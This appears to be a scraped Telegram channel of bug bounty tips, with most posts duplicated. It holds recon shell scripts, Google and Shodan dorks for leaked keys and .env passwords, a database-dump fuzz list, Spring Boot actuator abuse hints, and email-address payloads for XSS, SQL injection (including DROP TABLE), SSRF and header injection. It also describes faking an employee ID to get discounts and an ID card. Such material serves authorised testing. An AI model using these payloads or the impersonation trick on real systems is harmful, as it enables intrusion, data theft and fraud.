#Bug_Bounty_Tips_6
🛡BugBounty_Tips
Before Run this script we have to install couple of additional tools:
amass
assetfinder
subfinder
filter-resolved
Here’s a quick and basic recon routine for finding subdomains while doing bug bounty:
🛡BugBounty_Tips
Before Run this script we have to install couple of additional tools:
amass
assetfinder
subfinder
filter-resolved
Here’s a quick and basic recon routine for finding subdomains while doing bug bounty:
#!/bin/bash☣️@InfoSecTube
# $1 => example.domain
amass enum --passive -d $1 -o domains_$1
assetfinder --subs-only $1 | tee -a domains_41
subfinder -d $1 -o domains_subfinder_$1
cat domains_subfinder_$1 | tee -a domains_$1
sort -u domains_$1 -o domains_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
GitHub
GitHub - owasp-amass/amass: In-depth attack surface mapping and asset discovery
In-depth attack surface mapping and asset discovery - owasp-amass/amass
👍1
#Bug_Bounty_Tips_7
🛡BugBounty_Tips
Install Instruction:
apt-get -y install parallel
Here’s a super useful recon one-liner to quickly validate list of hostnames and subdomains:
🛡BugBounty_Tips
Install Instruction:
apt-get -y install parallel
Here’s a super useful recon one-liner to quickly validate list of hostnames and subdomains:
cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk
This one-liner will spawn 50 instances of curl in parallel and display the HTTP status code and response size in bytes for each host in a beautiful way😊☣️@InfoSecTube
#Bug_Bounty_Tips_8
🛡BugBounty_Tips
Before Run this script you must install several additional tools:
subfinder
amass
httpprob
waybackurls
kxss
this shell script to identify XSS (Cross-Site Scripting) vulnerabilities using a number of open-source tools chained together:
🛡BugBounty_Tips
Before Run this script you must install several additional tools:
subfinder
amass
httpprob
waybackurls
kxss
this shell script to identify XSS (Cross-Site Scripting) vulnerabilities using a number of open-source tools chained together:
#!/bin/bash☣️@InfoSecTube
# $1 => example.domain
subfinder -d $1 -o domains_subfinder_$1
amass enum --passive -d $1 -o domains_$1
cat domains_subfinder_$1 | tee -a domain_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
cat domains_$1.txt | ~/go/bin/httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt
🔥1
#Bug_Bounty_Tips_9
🛡BugBounty_Tips
Sometimes, developers think that hiding a button is enough. Try accessing the following sign-up URIs.
Chances are that we will be able to register a new user and access privileged areas of the web application, or at least get a foothold into it.
☣️@InfoSecTube
🛡BugBounty_Tips
Sometimes, developers think that hiding a button is enough. Try accessing the following sign-up URIs.
Chances are that we will be able to register a new user and access privileged areas of the web application, or at least get a foothold into it.
☣️@InfoSecTube
#Bug_Bounty_Tips_10
🛡BugBounty_Tips
Here are Top 5 Google dorks for identifying interesting and potentially sensitive information about our target:
With these dorks we are looking for open directory listing, log files, private keys, spreadsheets, database files and other interesting data.
☣️@InfoSecTube
🛡BugBounty_Tips
Here are Top 5 Google dorks for identifying interesting and potentially sensitive information about our target:
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
With these dorks we are looking for open directory listing, log files, private keys, spreadsheets, database files and other interesting data.
☣️@InfoSecTube
#Bug_Bounty_Tips_11
🛡BugBounty_Tips
If you are hunting on a Drupal website, fuzz with Burp Suite Intruder (or any other similar tool) on ‘/node/$’ where ‘$’ is a number (from 1 to 500). For example:
Chances are that we will find hidden pages (test, dev) which are not referenced by the search engines.
☣️@InfoSecTube
🛡BugBounty_Tips
If you are hunting on a Drupal website, fuzz with Burp Suite Intruder (or any other similar tool) on ‘/node/$’ where ‘$’ is a number (from 1 to 500). For example:
https://target.com/node/1
https://target.com/node/2
https://target.com/node/3
…
https://target.com/node/499
https://target.com/node/500
Chances are that we will find hidden pages (test, dev) which are not referenced by the search engines.
☣️@InfoSecTube
#Bug_Bounty_Tips_12
🛡BugBounty_Tips
Before use this script you must install additional tools:
gau
fff
gf
gf-secrets
Find sensitive information disclosure using special gf-secrets patterns. Here’s how to use them:
🛡BugBounty_Tips
Before use this script you must install additional tools:
gau
fff
gf
gf-secrets
Find sensitive information disclosure using special gf-secrets patterns. Here’s how to use them:
# Search for testing point with gau and fff☣️@InfoSecTube
gau target -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/
# After we save responses from known URLs, it's time to dig for secrets
for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done
#Bug_Bounty_Tips_13
🛡BugBounty_Tips
✔️Spring Boot is an open source Java-based framework used to build stand-alone spring applications based on the concepts of micro services.
🔰Spring Boot Actuator is a mechanism of interacting with them using a web interface. They are typically mapped to URL such as:
🔶https://target.com/env
🔸https://target.com/heapdump
🔸etc.
#Shodan_Dorks
♦️Search for the following favicon hash in Shodan to find Spring Boot servers deployed in the target organization:
🔺Then check for exposed actuators. If /env is available, you can probably achieve RCE. If /heapdump is accessible, you may find private keys and tokens.
☣️@InfoSecTube
🛡BugBounty_Tips
✔️Spring Boot is an open source Java-based framework used to build stand-alone spring applications based on the concepts of micro services.
🔰Spring Boot Actuator is a mechanism of interacting with them using a web interface. They are typically mapped to URL such as:
🔶https://target.com/env
🔸https://target.com/heapdump
🔸etc.
#Shodan_Dorks
♦️Search for the following favicon hash in Shodan to find Spring Boot servers deployed in the target organization:
org:YOUR_TARGET http.favicon.hash:116323821
🔺Then check for exposed actuators. If /env is available, you can probably achieve RCE. If /heapdump is accessible, you may find private keys and tokens.
☣️@InfoSecTube
#Bug_Bounty_Tips_14
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
setup.sql
sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
#Bug_Bounty_Tips_15
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
🔺Template injection:
🔺SQL injection:
🔺SSRF (Server-Side Request Forgery):
🔺Parameter pollution:
🔺(Email) header injection:
☣️@InfoSecTube
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
🔺Template injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
🔺SQL injection:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
🔺SSRF (Server-Side Request Forgery):
[email protected]
john.doe@[127.0.0.1]
🔺Parameter pollution:
victim&[email protected]
🔺(Email) header injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
☣️@InfoSecTube
#Bug_Bounty_Tips_16
🛡BugBounty_Tips
🌀Registering as an Employee leads to claim of Employee Only Private Offers and ultimately getting an “Identification Card”.
Methodolgy:
1-Searched for Target‘s employee offers on Google:
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube
🛡BugBounty_Tips
🌀Registering as an Employee leads to claim of Employee Only Private Offers and ultimately getting an “Identification Card”.
Methodolgy:
1-Searched for Target‘s employee offers on Google:
inurl:"Target Name" employee offers2-Found website which provides offers to the Target.
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube